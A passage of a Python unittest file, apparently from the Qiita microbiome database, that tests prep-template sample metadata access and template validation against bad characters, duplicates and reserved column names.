'1.SKB8.640193',\n qdb.metadata_template.sample_template.SampleTemplate(1))\n\n def test_init(self):\n \"\"\"Init correctly initializes the PrepSample object\"\"\"\n sample = qdb.metadata_template.prep_template.PrepSample(\n self.sample_id, self.prep_template)\n # Check that the internal id have been correctly set\n self.assertEqual(sample._id, '1.SKB8.640193')\n # Check that the internal template have been correctly set\n self.assertEqual(sample._md_template, self.prep_template)\n # Check that the internal dynamic table name have been correctly set\n self.assertEqual(sample._dynamic_table, \"prep_1\")\n\n def test_eq_true(self):\n \"\"\"Equality correctly returns true\"\"\"\n other = qdb.metadata_template.prep_template.PrepSample(\n self.sample_id, self.prep_template)\n self.assertTrue(self.tester == other)\n\n def test_eq_false_type(self):\n \"\"\"Equality returns false if types are not equal\"\"\"\n other = qdb.metadata_template.sample_template.Sample(\n self.sample_id,\n qdb.metadata_template.sample_template.SampleTemplate(1))\n self.assertFalse(self.tester == other)\n\n def test_eq_false_id(self):\n \"\"\"Equality returns false if ids are different\"\"\"\n other = qdb.metadata_template.prep_template.PrepSample(\n '1.SKD8.640184', self.prep_template)\n self.assertFalse(self.tester == other)\n\n def test_exists_true(self):\n \"\"\"Exists returns true if the PrepSample exists\"\"\"\n self.assertTrue(qdb.metadata_template.prep_template.PrepSample.exists(\n self.sample_id, self.prep_template))\n\n def test_exists_false(self):\n \"\"\"Exists returns false if the PrepSample does not exists\"\"\"\n self.assertFalse(qdb.metadata_template.prep_template.PrepSample.exists(\n 'Not_a_Sample', self.prep_template))\n\n def test_get_categories(self):\n \"\"\"Correctly returns the set of category headers\"\"\"\n obs = self.tester._get_categories()\n self.assertEqual(obs, self.exp_categories)\n\n def test_len(self):\n \"\"\"Len returns the correct number of categories\"\"\"\n self.assertEqual(len(self.tester), 22)\n\n def test_getitem_required(self):\n \"\"\"Get item returns the correct metadata value from the required table\n \"\"\"\n self.assertEqual(self.tester['center_name'], 'ANL')\n self.assertTrue(self.tester['center_project_name'] is None)\n\n def test_getitem_dynamic(self):\n \"\"\"Get item returns the correct metadata value from the dynamic table\n \"\"\"\n self.assertEqual(self.tester['pcr_primers'],\n 'FWD:GTGCCAGCMGCCGCGGTAA; REV:GGACTACHVGGGTWTCTAAT')\n self.assertEqual(self.tester['barcode'], 'AGCGCTCACATC')\n\n def test_getitem_id_column(self):\n \"\"\"Get item returns the correct metadata value from the changed column\n \"\"\"\n self.assertEqual(self.tester['emp_status'], 'EMP')\n\n def test_getitem_error(self):\n \"\"\"Get item raises an error if category does not exists\"\"\"\n with self.assertRaises(KeyError):\n self.tester['Not_a_Category']\n\n def test_iter(self):\n \"\"\"iter returns an iterator over the category headers\"\"\"\n obs = self.tester.__iter__()\n self.assertTrue(isinstance(obs, Iterable))\n self.assertEqual(set(obs), self.exp_categories)\n\n def test_contains_true(self):\n \"\"\"contains returns true if the category header exists\"\"\"\n self.assertTrue('Barcode' in self.tester)\n self.assertTrue('barcode' in self.tester)\n\n def test_contains_false(self):\n \"\"\"contains returns false if the category header does not exists\"\"\"\n self.assertFalse('Not_a_Category' in self.tester)\n\n def test_keys(self):\n \"\"\"keys returns an iterator over the metadata headers\"\"\"\n obs = self.tester.keys()\n self.assertTrue(isinstance(obs, Iterable))\n self.assertEqual(set(obs), self.exp_categories)\n\n def test_values(self):\n \"\"\"values returns an iterator over the values\"\"\"\n obs = self.tester.values()\n self.assertTrue(isinstance(obs, Iterable))\n exp = {'ANL', None, None, None, 'EMP', 'AGCGCTCACATC',\n 'This analysis was done as in Caporaso et al 2011 Genome '\n 'research. The PCR primers (F515/R806) were developed against '\n 'the V4 region of the 16S rRNA (both bacteria and archaea), '\n 'which we determined would yield optimal community clustering '\n 'with reads of this length using a procedure similar to that of'\n ' ref. 15. [For reference, this primer pair amplifies the '\n 'region 533_786 in the Escherichia coli strain 83972 sequence '\n '(greengenes accession no. prokMSA_id:470367).] The reverse PCR'\n ' primer is barcoded with a 12-base error-correcting Golay code'\n ' to facilitate multiplexing of up to 1,500 samples per lane, '\n 'and both PCR primers contain sequencer adapter regions.',\n 'GTGCCAGCMGCCGCGGTAA', 'V4', '16S rRNA', 'ANL',\n 's_G1_L001_sequences', '8/1/12', 'ANL',\n 'micro biome of soil and rhizosphere of cannabis plants from '\n 'CA', 'Cannabis Soil Microbiome', 'Illumina', 'Illumina MiSeq',\n '.25,g', 'Sequencing by synthesis', 'MiSeq', 'ANL',\n 'FWD:GTGCCAGCMGCCGCGGTAA; REV:GGACTACHVGGGTWTCTAAT', 'CCME'}\n self.assertEqual(set(obs), exp)\n\n def test_items(self):\n \"\"\"items returns an iterator over the (key, value) tuples\"\"\"\n obs = self.tester.items()\n self.assertTrue(isinstance(obs, Iterable))\n exp = {('center_name', 'ANL'), ('center_project_name', None),\n ('emp_status', 'EMP'), ('barcode', 'AGCGCTCACATC'),\n ('library_construction_protocol',\n 'This analysis was done as in Caporaso et al 2011 Genome '\n 'research. The PCR primers (F515/R806) were developed against '\n 'the V4 region of the 16S rRNA (both bacteria and archaea), '\n 'which we determined would yield optimal community clustering '\n 'with reads of this length using a procedure similar to that '\n 'of ref. 15. [For reference, this primer pair amplifies the '\n 'region 533_786 in the Escherichia coli strain 83972 sequence '\n '(greengenes accession no. prokMSA_id:470367).] The reverse '\n 'PCR primer is barcoded with a 12-base error-correcting Golay '\n 'code to facilitate multiplexing of up to 1,500 samples per '\n 'lane, and both PCR primers contain sequencer adapter '\n 'regions.'), ('primer', 'GTGCCAGCMGCCGCGGTAA'),\n ('target_subfragment', 'V4'), ('target_gene', '16S rRNA'),\n ('run_center', 'ANL'), ('run_prefix', 's_G1_L001_sequences'),\n ('run_date', '8/1/12'), ('experiment_center', 'ANL'),\n ('experiment_design_description',\n 'micro biome of soil and rhizosphere of cannabis plants '\n 'from CA'), ('experiment_title', 'Cannabis Soil Microbiome'),\n ('platform', 'Illumina'),\n ('instrument_model', 'Illumina MiSeq'), ('samp_size', '.25,g'),\n ('sequencing_meth', 'Sequencing by synthesis'),\n ('illumina_technology', 'MiSeq'), ('sample_center', 'ANL'),\n ('pcr_primers',\n 'FWD:GTGCCAGCMGCCGCGGTAA; REV:GGACTACHVGGGTWTCTAAT'),\n ('study_center', 'CCME')}\n self.assertEqual(set(obs), exp)\n\n def test_get(self):\n \"\"\"get returns the correct sample object\"\"\"\n self.assertEqual(self.tester.get('barcode'), 'AGCGCTCACATC')\n\n def test_get_none(self):\n \"\"\"get returns none if the sample id is not present\"\"\"\n self.assertTrue(self.tester.get('Not_a_Category') is None)\n\n def test_columns_restrictions(self):\n \"\"\"that it returns SAMPLE_TEMPLATE_COLUMNS\"\"\"\n exp = deepcopy(qdb.metadata_template.constants.PREP_TEMPLATE_COLUMNS)\n exp.update(\n qdb.metadata_template.constants.PREP_TEMPLATE_COLUMNS_TARGET_GENE)\n self.assertEqual(self.prep_template.columns_restrictions, exp)\n\n def test_can_be_updated(self):\n \"\"\"test if the template can be updated\"\"\"\n # you can't update restricted colums in a pt with data\n self.assertFalse(self.prep_template.can_be_updated({'barcode'}))\n # but you can if not restricted\n self.assertTrue(self.prep_template.can_be_updated({'center_name'}))\n\n def test_can_be_extended(self):\n \"\"\"test if the template can be extended\"\"\"\n # You can always add columns\n obs_bool, obs_msg = self.prep_template.can_be_extended([], [\"NEW_COL\"])\n self.assertTrue(obs_bool)\n self.assertEqual(obs_msg, \"\")\n # You can't add samples if there are preprocessed data generated\n obs_bool, obs_msg = self.prep_template.can_be_extended(\n [\"NEW_SAMPLE\"], [])\n self.assertFalse(obs_bool)\n exp_msg = (\"The artifact attached to the prep template has already \"\n \"been processed. No new samples can be added to the prep \"\n \"template\")\n self.assertEqual(obs_msg, exp_msg)\n\n def test_can_be_extended_duplicated_column(self):\n \"\"\"test if the template can be extended\"\"\"\n with self.assertRaises(qdb.exceptions.QiitaDBColumnError):\n self.prep_template.can_be_extended([], [\"season_environment\"])\n\n def test_metadata_headers(self):\n PT = qdb.metadata_template.prep_template.PrepTemplate\n obs = PT.metadata_headers()\n exp = ['barcode', 'center_name', 'center_project_name', 'emp_status',\n 'experiment_center', 'experiment_design_description',\n 'experiment_title', 'illumina_technology', 'instrument_model',\n 'library_construction_protocol', 'pcr_primers', 'platform',\n 'primer', 'run_center', 'run_date', 'run_prefix', 'samp_size',\n 'sample_center', 'sequencing_meth', 'study_center',\n 'target_gene', 'target_subfragment']\n self.assertCountEqual(obs, exp)\n\n def test_setitem(self):\n with self.assertRaises(qdb.exceptions.QiitaDBColumnError):\n self.tester['column that does not exist'] = 0.3\n\n tester = qdb.metadata_template.prep_template.PrepSample(\n '1.SKD8.640184', self.prep_template)\n\n self.assertEqual(tester['center_name'], 'ANL')\n tester['center_name'] = \"FOO\"\n self.assertEqual(tester['center_name'], \"FOO\")\n\n def test_delitem(self):\n \"\"\"delitem raises an error (currently not allowed)\"\"\"\n with self.assertRaises(qdb.exceptions.QiitaDBNotImplementedError):\n del self.tester['pcr_primers']\n\n\n@qiita_test_checker()\nclass TestPrepTemplate(TestCase):\n def setUp(self):\n # qdb.metadata_template.base_metadata_template.QIITA_COLUMN_NAME is\n # the name of the sample where we store all columns for a sample/prep\n # information and in this tests we want to avoid having to import it\n # in different places so adding to the setUp\n self.QCN = \\\n qdb.metadata_template.base_metadata_template.QIITA_COLUMN_NAME\n self.metadata_dict = {\n 'SKB8.640193': {'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'ebi_submission_accession': None,\n 'EMP_status': 'EMP',\n 'str_column': 'Value for sample 1',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'barcode': 'GTCCGCAAGTTA',\n 'run_prefix': \"s_G1_L001_sequences\",\n 'platform': 'Illumina',\n 'qiita_prep_id': 1000,\n 'instrument_model': 'Illumina MiSeq',\n 'library_construction_protocol': 'AAAA',\n 'insdc_nulls': '3.6',\n 'experiment_design_description': 'BBBB'},\n 'SKD8.640184': {'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'ebi_submission_accession': None,\n 'EMP_status': 'EMP',\n 'str_column': 'Value for sample 2',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'barcode': 'CGTAGAGCTCTC',\n 'run_prefix': \"s_G1_L001_sequences\",\n 'platform': 'Illumina',\n 'qiita_prep_id': 1000,\n 'instrument_model': 'Illumina MiSeq',\n 'library_construction_protocol': 'AAAA',\n 'insdc_nulls': 'NoT applicable',\n 'experiment_design_description': 'BBBB'},\n 'SKB7.640196': {'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'ebi_submission_accession': None,\n 'EMP_status': 'EMP',\n 'str_column': 'Value for sample 3',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'barcode': 'CCTCTGAGAGCT',\n 'run_prefix': \"s_G1_L002_sequences\",\n 'platform': 'Illumina',\n 'qiita_prep_id': 1000,\n 'instrument_model': 'Illumina MiSeq',\n 'library_construction_protocol': 'AAAA',\n 'insdc_nulls': 'unspecified',\n 'experiment_design_description': 'BBBB'}\n }\n self.metadata = pd.DataFrame.from_dict(self.metadata_dict,\n orient='index', dtype=str)\n\n metadata_prefixed_dict = {\n '1.SKB8.640193': {'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'ebi_submission_accession': None,\n 'EMP_status': 'EMP',\n 'str_column': 'Value for sample 1',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'barcode': 'GTCCGCAAGTTA',\n 'run_prefix': \"s_G1_L001_sequences\",\n 'platform': 'Illumina',\n 'qiita_prep_id': 1000,\n 'instrument_model': 'Illumina MiSeq',\n 'library_construction_protocol': 'AAAA',\n 'insdc_nulls': '3.6',\n 'experiment_design_description': 'BBBB'},\n '1.SKD8.640184': {'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'ebi_submission_accession': None,\n 'EMP_status': 'EMP',\n 'str_column': 'Value for sample 2',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'barcode': 'CGTAGAGCTCTC',\n 'run_prefix': \"s_G1_L001_sequences\",\n 'platform': 'Illumina',\n 'qiita_prep_id': 1000,\n 'instrument_model': 'Illumina MiSeq',\n 'library_construction_protocol': 'AAAA',\n 'insdc_nulls': 'not applicable',\n 'experiment_design_description': 'BBBB'},\n '1.SKB7.640196': {'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'ebi_submission_accession': None,\n 'EMP_status': 'EMP',\n 'str_column': 'Value for sample 3',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'barcode': 'CCTCTGAGAGCT',\n 'run_prefix': \"s_G1_L002_sequences\",\n 'platform': 'Illumina',\n 'qiita_prep_id': 1000,\n 'instrument_model': 'Illumina MiSeq',\n 'library_construction_protocol': 'AAAA',\n 'insdc_nulls': 'not applicable',\n 'experiment_design_description': 'BBBB'}\n }\n self.metadata_prefixed = pd.DataFrame.from_dict(metadata_prefixed_dict,\n orient='index')\n\n self.test_study = qdb.study.Study(1)\n self.data_type = \"18S\"\n self.data_type_id = 2\n\n self.tester = qdb.metadata_template.prep_template.PrepTemplate(1)\n self.exp_sample_ids = {\n '1.SKB1.640202', '1.SKB2.640194', '1.SKB3.640195', '1.SKB4.640189',\n '1.SKB5.640181', '1.SKB6.640176', '1.SKB7.640196', '1.SKB8.640193',\n '1.SKB9.640200', '1.SKD1.640179', '1.SKD2.640178', '1.SKD3.640198',\n '1.SKD4.640185', '1.SKD5.640186', '1.SKD6.640190', '1.SKD7.640191',\n '1.SKD8.640184', '1.SKD9.640182', '1.SKM1.640183', '1.SKM2.640199',\n '1.SKM3.640197', '1.SKM4.640180', '1.SKM5.640177', '1.SKM6.640187',\n '1.SKM7.640188', '1.SKM8.640201', '1.SKM9.640192'}\n\n # Generate some files for new artifact\n fd, fp1 = mkstemp(suffix='_seqs.fastq')\n close(fd)\n with open(fp1, 'w') as f:\n f.write(\"@HWI-ST753:189:D1385ACXX:1:1101:1214:1906 1:N:0:\\n\"\n \"NACGTAGGGTGCAAGCGTTGTCCGGAATNA\\n\"\n \"+\\n\"\n \"#1=DDFFFHHHHHJJJJJJJJJJJJGII#0\\n\")\n fd, fp2 = mkstemp(suffix='_barcodes.fastq')\n close(fd)\n with open(fp2, 'w') as f:\n f.write(\"@HWI-ST753:189:D1385ACXX:1:1101:1214:1906 2:N:0:\\n\"\n \"NNNCNNNNNNNNN\\n\"\n \"+\\n\"\n \"#############\\n\")\n self.filepaths = [(fp1, 1), (fp2, 3)]\n self._clean_up_files = [fp1, fp2]\n\n def tearDown(self):\n for f in self._clean_up_files:\n if exists(f):\n remove(f)\n\n def test_study_id(self):\n \"\"\"Ensure that the correct study ID is returned\"\"\"\n self.assertEqual(self.tester.study_id, 1)\n\n def test_init_unknown_error(self):\n \"\"\"Init raises an error if the id is not known\"\"\"\n with self.assertRaises(qdb.exceptions.QiitaDBUnknownIDError):\n qdb.metadata_template.prep_template.PrepTemplate(30000)\n\n def test_init(self):\n \"\"\"Init successfully instantiates the object\"\"\"\n st = qdb.metadata_template.prep_template.PrepTemplate(1)\n self.assertTrue(st.id, 1)\n\n def test_table_name(self):\n \"\"\"Table name return the correct string\"\"\"\n obs = qdb.metadata_template.prep_template.PrepTemplate._table_name(1)\n self.assertEqual(obs, \"prep_1\")\n\n def test_exists_true(self):\n \"\"\"Exists returns true when the PrepTemplate already exists\"\"\"\n self.assertTrue(\n qdb.metadata_template.prep_template.PrepTemplate.exists(1))\n\n def test_exists_false(self):\n \"\"\"Exists returns false when the PrepTemplate does not exists\"\"\"\n self.assertFalse(\n qdb.metadata_template.prep_template.PrepTemplate.exists(30000))\n\n def test_get_sample_ids(self):\n \"\"\"get_sample_ids returns the correct set of sample ids\"\"\"\n obs = self.tester._get_sample_ids()\n self.assertEqual(obs, self.exp_sample_ids)\n\n def test_len(self):\n \"\"\"Len returns the correct number of sample ids\"\"\"\n self.assertEqual(len(self.tester), 27)\n\n def test_getitem(self):\n \"\"\"Get item returns the correct sample object\"\"\"\n obs = self.tester['1.SKM7.640188']\n exp = qdb.metadata_template.prep_template.PrepSample(\n '1.SKM7.640188', self.tester)\n self.assertEqual(obs, exp)\n\n def test_getitem_error(self):\n \"\"\"Get item raises an error if key does not exists\"\"\"\n with self.assertRaises(KeyError):\n self.tester['Not_a_Sample']\n\n def test_iter(self):\n \"\"\"iter returns an iterator over the sample ids\"\"\"\n obs = self.tester.__iter__()\n self.assertTrue(isinstance(obs, Iterable))\n self.assertEqual(set(obs), self.exp_sample_ids)\n\n def test_contains_true(self):\n \"\"\"contains returns true if the sample id exists\"\"\"\n self.assertTrue('1.SKM7.640188' in self.tester)\n\n def test_contains_false(self):\n \"\"\"contains returns false if the sample id does not exists\"\"\"\n self.assertFalse('Not_a_Sample' in self.tester)\n\n def test_keys(self):\n \"\"\"keys returns an iterator over the sample ids\"\"\"\n obs = self.tester.keys()\n self.assertTrue(isinstance(obs, Iterable))\n self.assertEqual(set(obs), self.exp_sample_ids)\n\n def test_values(self):\n \"\"\"values returns an iterator over the values\"\"\"\n obs = self.tester.values()\n self.assertTrue(isinstance(obs, Iterable))\n exp = {qdb.metadata_template.prep_template.PrepSample('1.SKB1.640202',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKB2.640194',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKB3.640195',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKB4.640189',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKB5.640181',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKB6.640176',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKB7.640196',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKB8.640193',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKB9.640200',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKD1.640179',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKD2.640178',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKD3.640198',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKD4.640185',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKD5.640186',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKD6.640190',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKD7.640191',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKD8.640184',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKD9.640182',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKM1.640183',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKM2.640199',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKM3.640197',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKM4.640180',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKM5.640177',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKM6.640187',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKM7.640188',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKM8.640201',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKM9.640192',\n self.tester)}\n # Creating a list and looping over it since unittest does not call\n # the __eq__ function on the objects\n for o, e in zip(sorted(list(obs), key=lambda x: x.id),\n sorted(exp, key=lambda x: x.id)):\n self.assertEqual(o, e)\n\n def test_items(self):\n \"\"\"items returns an iterator over the (key, value) tuples\"\"\"\n obs = self.tester.items()\n self.assertTrue(isinstance(obs, Iterable))\n exp = [('1.SKB1.640202',\n qdb.metadata_template.prep_template.PrepSample('1.SKB1.640202',\n self.tester)),\n ('1.SKB2.640194',\n qdb.metadata_template.prep_template.PrepSample('1.SKB2.640194',\n self.tester)),\n ('1.SKB3.640195',\n qdb.metadata_template.prep_template.PrepSample('1.SKB3.640195',\n self.tester)),\n ('1.SKB4.640189',\n qdb.metadata_template.prep_template.PrepSample('1.SKB4.640189',\n self.tester)),\n ('1.SKB5.640181',\n qdb.metadata_template.prep_template.PrepSample('1.SKB5.640181',\n self.tester)),\n ('1.SKB6.640176',\n qdb.metadata_template.prep_template.PrepSample('1.SKB6.640176',\n self.tester)),\n ('1.SKB7.640196',\n qdb.metadata_template.prep_template.PrepSample('1.SKB7.640196',\n self.tester)),\n ('1.SKB8.640193',\n qdb.metadata_template.prep_template.PrepSample('1.SKB8.640193',\n self.tester)),\n ('1.SKB9.640200',\n qdb.metadata_template.prep_template.PrepSample('1.SKB9.640200',\n self.tester)),\n ('1.SKD1.640179',\n qdb.metadata_template.prep_template.PrepSample('1.SKD1.640179',\n self.tester)),\n ('1.SKD2.640178',\n qdb.metadata_template.prep_template.PrepSample('1.SKD2.640178',\n self.tester)),\n ('1.SKD3.640198',\n qdb.metadata_template.prep_template.PrepSample('1.SKD3.640198',\n self.tester)),\n ('1.SKD4.640185',\n qdb.metadata_template.prep_template.PrepSample('1.SKD4.640185',\n self.tester)),\n ('1.SKD5.640186',\n qdb.metadata_template.prep_template.PrepSample('1.SKD5.640186',\n self.tester)),\n ('1.SKD6.640190',\n qdb.metadata_template.prep_template.PrepSample('1.SKD6.640190',\n self.tester)),\n ('1.SKD7.640191',\n qdb.metadata_template.prep_template.PrepSample('1.SKD7.640191',\n self.tester)),\n ('1.SKD8.640184',\n qdb.metadata_template.prep_template.PrepSample('1.SKD8.640184',\n self.tester)),\n ('1.SKD9.640182',\n qdb.metadata_template.prep_template.PrepSample('1.SKD9.640182',\n self.tester)),\n ('1.SKM1.640183',\n qdb.metadata_template.prep_template.PrepSample('1.SKM1.640183',\n self.tester)),\n ('1.SKM2.640199',\n qdb.metadata_template.prep_template.PrepSample('1.SKM2.640199',\n self.tester)),\n ('1.SKM3.640197',\n qdb.metadata_template.prep_template.PrepSample('1.SKM3.640197',\n self.tester)),\n ('1.SKM4.640180',\n qdb.metadata_template.prep_template.PrepSample('1.SKM4.640180',\n self.tester)),\n ('1.SKM5.640177',\n qdb.metadata_template.prep_template.PrepSample('1.SKM5.640177',\n self.tester)),\n ('1.SKM6.640187',\n qdb.metadata_template.prep_template.PrepSample('1.SKM6.640187',\n self.tester)),\n ('1.SKM7.640188',\n qdb.metadata_template.prep_template.PrepSample('1.SKM7.640188',\n self.tester)),\n ('1.SKM8.640201',\n qdb.metadata_template.prep_template.PrepSample('1.SKM8.640201',\n self.tester)),\n ('1.SKM9.640192',\n qdb.metadata_template.prep_template.PrepSample('1.SKM9.640192',\n self.tester))]\n # Creating a list and looping over it since unittest does not call\n # the __eq__ function on the objects\n for o, e in zip(sorted(list(obs)), sorted(exp)):\n self.assertEqual(o, e)\n\n def test_get(self):\n \"\"\"get returns the correct PrepSample object\"\"\"\n obs = self.tester.get('1.SKM7.640188')\n exp = qdb.metadata_template.prep_template.PrepSample(\n '1.SKM7.640188', self.tester)\n self.assertEqual(obs, exp)\n\n def test_get_none(self):\n \"\"\"get returns none if the sample id is not present\"\"\"\n self.assertTrue(self.tester.get('Not_a_Sample') is None)\n\n def test_data_type(self):\n \"\"\"data_type returns the string with the data_type\"\"\"\n self.assertTrue(self.tester.data_type(), \"18S\")\n\n def test_data_type_id(self):\n \"\"\"data_type returns the int with the data_type_id\"\"\"\n self.assertTrue(self.tester.data_type(ret_id=True), 2)\n\n def test_investigation_type(self):\n \"\"\"investigation_type works correctly\"\"\"\n self.assertEqual(self.tester.investigation_type, \"Metagenomics\")\n\n def test_to_dataframe(self):\n obs = self.tester.to_dataframe()\n # We don't test the specific values as this would blow up the size\n # of this file as the amount of lines would go to ~1000\n\n # 27 samples\n self.assertEqual(len(obs), 27)\n self.assertEqual(set(obs.index), {\n u'1.SKB1.640202', u'1.SKB2.640194', u'1.SKB3.640195',\n u'1.SKB4.640189', u'1.SKB5.640181', u'1.SKB6.640176',\n u'1.SKB7.640196', u'1.SKB8.640193', u'1.SKB9.640200',\n u'1.SKD1.640179', u'1.SKD2.640178', u'1.SKD3.640198',\n u'1.SKD4.640185', u'1.SKD5.640186', u'1.SKD6.640190',\n u'1.SKD7.640191', u'1.SKD8.640184', u'1.SKD9.640182',\n u'1.SKM1.640183', u'1.SKM2.640199', u'1.SKM3.640197',\n u'1.SKM4.640180', u'1.SKM5.640177', u'1.SKM6.640187',\n u'1.SKM7.640188', u'1.SKM8.640201', u'1.SKM9.640192'})\n\n self.assertEqual(set(obs.columns), {\n u'center_name', u'center_project_name',\n u'emp_status', u'barcode',\n u'library_construction_protocol', u'primer',\n u'target_subfragment', u'target_gene', u'run_center',\n u'run_prefix', u'run_date', u'experiment_center',\n u'experiment_design_description', u'experiment_title', u'platform',\n u'instrument_model', u'samp_size', u'sequencing_meth',\n u'illumina_technology', u'sample_center', u'pcr_primers',\n u'study_center', 'qiita_prep_id'})\n\n # test with add_ebi_accessions as True\n obs = self.tester.to_dataframe(True)\n self.assertEqual(\n self.tester.ebi_experiment_accessions,\n obs.qiita_ebi_experiment_accessions.to_dict())\n\n def test_clean_validate_template_error_bad_chars(self):\n \"\"\"Raises an error if there are invalid characters in the sample names\n \"\"\"\n self.metadata.index = ['o()xxxx[{::::::::>', 'sample.1', 'sample.3']\n PT = qdb.metadata_template.prep_template.PrepTemplate\n with self.assertRaises(qdb.exceptions.QiitaDBColumnError):\n PT._clean_validate_template(self.metadata, 2)\n\n def test_clean_validate_template_error_duplicate_cols(self):\n \"\"\"Raises an error if there are duplicated columns in the template\"\"\"\n self.metadata['STR_COLUMN'] = pd.Series(['', '', ''],\n index=self.metadata.index)\n PT = qdb.metadata_template.prep_template.PrepTemplate\n with self.assertRaises(qdb.exceptions.QiitaDBDuplicateHeaderError):\n PT._clean_validate_template(self.metadata, 2)\n\n def test_clean_validate_template_error_duplicate_samples(self):\n \"\"\"Raises an error if there are duplicated samples in the templates\"\"\"\n self.metadata.index = ['sample.1', 'sample.1', 'sample.3']\n PT = qdb.metadata_template.prep_template.PrepTemplate\n with self.assertRaises(qdb.exceptions.QiitaDBDuplicateSamplesError):\n PT._clean_validate_template(self.metadata, 2)\n\n def test_clean_validate_template(self):\n PT = qdb.metadata_template.prep_template.PrepTemplate\n # modify input to make sure we hit all cases\n md = self.metadata.copy()\n md.loc['SKB7.640196']['str_column'] = 'UnSpeciFied'\n obs = PT._clean_validate_template(md, 2)\n metadata_dict = {\n '2.SKB8.640193': {'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'ebi_submission_accession': None,\n 'emp_status': 'EMP',\n 'str_column': 'Value for sample 1',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'barcode': 'GTCCGCAAGTTA',\n 'run_prefix': \"s_G1_L001_sequences\",\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'library_construction_protocol': 'AAAA',\n 'insdc_nulls': '3.6',\n 'experiment_design_description': 'BBBB'},\n '2.SKD8.640184': {'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'ebi_submission_accession': None,\n 'emp_status': 'EMP',\n 'str_column': 'Value for sample 2',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'barcode': 'CGTAGAGCTCTC',\n 'run_prefix': \"s_G1_L001_sequences\",\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'library_construction_protocol': 'AAAA',\n 'insdc_nulls': 'not applicable',\n 'experiment_design_description': 'BBBB'},\n '2.SKB7.640196': {'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'ebi_submission_accession': None,\n 'emp_status': 'EMP',\n 'str_column': 'not applicable',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'barcode': 'CCTCTGAGAGCT',\n 'run_prefix': \"s_G1_L002_sequences\",\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'library_construction_protocol': 'AAAA',\n 'insdc_nulls': 'not applicable',\n 'experiment_design_description': 'BBBB'}\n }\n exp = pd.DataFrame.from_dict(metadata_dict, orient='index', dtype=str)\n\n obs.sort_index(axis=0, inplace=True)\n obs.sort_index(axis=1, inplace=True)\n exp.sort_index(axis=0, inplace=True)\n exp.sort_index(axis=1, inplace=True)\n\n assert_frame_equal(obs, exp, check_like=True)\n\n def test_clean_validate_template_no_forbidden_words1(self):\n PT = qdb.metadata_template.prep_template.PrepTemplate\n self.metadata.rename(columns={'center_name': 'sampleid'}, inplace=True)\n with self.assertRaises(qdb.exceptions.QiitaDBColumnError):\n PT._clean_validate_template(self.metadata, 2)\n\n def test_clean_validate_template_no_forbidden_words2(self):\n PT = qdb.metadata_template.prep_template.PrepTemplate\n self.metadata.rename(columns={'center_name': 'linkerprimersequence'},\n inplace=True)\n raised = False\n try:\n PT._clean_validate_template(self.metadata, 2)\n except qdb.exceptions.QiitaDBColumnError:\n raised = True\n self.assertFalse(raised, \"Exception raised\")\n\n def test_clean_validate_template_no_pgsql_reserved_words(self):\n PT = qdb.metadata_template.prep_template.PrepTemplate\n self.metadata.rename(columns={'center_name': 'select'}, inplace=True)\n with self.assertRaises(qdb.exceptions.QiitaDBColumnError):\n PT._clean_validate_template(self.metadata, 2)\n\n def test_clean_validate_template_no_qiime2_reserved_words(self):\n PT = qdb.metadata_template.prep_template.PrepTemplate\n self.metadata.rename(columns={'center_name': 'featureid'},\n inplace=True)\n with self.assertRaises(qdb.exceptions.QiitaDBColumnError):\n PT._clean_validate_template(self.metadata, 2)\n\n def test_clean_validate_template_no_invalid_chars(self):\n PT = qdb.metadata_template.prep_template.PrepTemplate\n self.metadata.rename(columns={'center_name': 'taxon id'}, inplace=True)\n with self.assertRaises(qdb.exceptions.QiitaDBColumnError):\n PT._clean_validate_template(self.metadata, 2)\n\n def test_clean_validate_template_no_invalid_chars2(self):\n PT = qdb.metadata_template.prep_template.PrepTemplate\n 